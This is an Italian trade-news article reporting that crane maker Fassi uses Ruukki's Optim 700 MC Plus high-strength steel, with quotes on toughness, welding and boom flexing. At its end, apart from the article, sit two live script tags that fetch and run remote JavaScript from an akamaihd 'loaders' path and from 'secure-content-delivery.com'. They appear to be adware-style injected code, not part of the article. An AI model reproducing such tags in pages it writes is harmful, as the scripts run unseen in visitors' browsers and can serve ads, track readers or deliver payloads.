1. Home
  2. Notizie e Mercato
  3. Acciaio Ruukki Optim 700 MC Plus per gru idrauliche Fassi

Acciaio Ruukki Optim 700 MC Plus per gru idrauliche Fassi

Materiali da costruzione di
5/5
votato da 1 persone
L’acciaio alto resistenziale Optim 700 MC Plus di Ruukki è la risposta ai requisiti più rigorosi in materia di tenacità e quindi di resilienza


L'azienda italiana Fassi Gru S.p.A è riconosciuta, nel mondo, tra i leader di prodotto nel settore delle gru idrauliche. La spiccata connotazione innovativa dei prodotti Fassi è garantita anche dall'impiego di materiali avanzati. Per incrementare ulteriormente la qualità e le prestazioni dei propri prodotti, a conclusione di uno specifico  progetto di ricerca, Fassi ha individuato nuovi requisiti di resilienza, secondo loro necessari, per l'approvazione dei materiali per la costruzione delle gru. L'acciaio altoresistenziale Optim 700 MC Plus di Ruukki è risultato il più idoneo ai requisiti e pertanto Fassi lo sta utilizzando come acciaio preferenziale.

"Con buone proprietà di resilienza e quindi di tenacità, possiamo garantire le prestazioni delle gru in tutte le condizioni e a tutte le temperature, ovunque nel mondo", spiega Rossano Ceresoli, Direttore Ricerca e Sviluppo di O.ME.FA. S.p.A, società del gruppo Fassi.

Ruukki è un precursore nella produzione e nello sviluppo di acciai strutturali ultra-altoresistenziali. Un'area di particolare interesse per Ruukki è sempre stata l'impiego degli acciai strutturali ultra-altoresistenziali Optim nei bracci di sollevamento delle gru e nelle strutture saldate in acciaio. Sin dal 2002, la gamma Ruukki di qualità Optim varia da 500 a 1100 MPa. Ruukki produce anche gli acciai temprati in linea (Direct Quenched, DQ) più sottili sul mercato (2,5 mm).

Gli acciai altoresistenziali hanno una meccanica della frattura complessa per cui è necessaria alta professionalità  nel loro utilizzo. “Secondo il mio punto di vista, il problema più rilevante nella fabbricazione delle gru risiede nella flessione della struttura della gru stessa. In passato le gru erano pesanti e compatte. Oggi, grazie agli acciai altoresistenziali, i bracci di sollevamento sono più leggeri e più lunghi e dobbiamo avere un controllo totale della flessione elastica”, spiega Ceresoli.  “Per quanto concerne l'acciaio impiegato nelle gru, noi pretendiamo ottime proprietà di resistenza e tenacità, una buona attitudine alla saldatura e alla piegatura, un'elevata omogeneità delle proprietà fisiche, chimiche e meccaniche e una ridotta variabilità degli spessori”, prosegue Ceresoli.

Ruukki sta continuamente migliorando le proprietà dell'acciaio e sta sviluppando la competenza nell'uso degli acciai ultra-altoresistenziali. Ruukki produce acciaio strutturali Optim QC altoresistenziali e acciaio Raex anti usura sfruttando il suo processo unico di tempra in linea.




<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script><script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script>